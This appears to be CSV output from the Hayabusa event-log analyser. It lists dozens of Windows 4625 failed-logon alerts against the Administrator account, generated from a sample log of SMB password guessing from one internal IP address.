2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
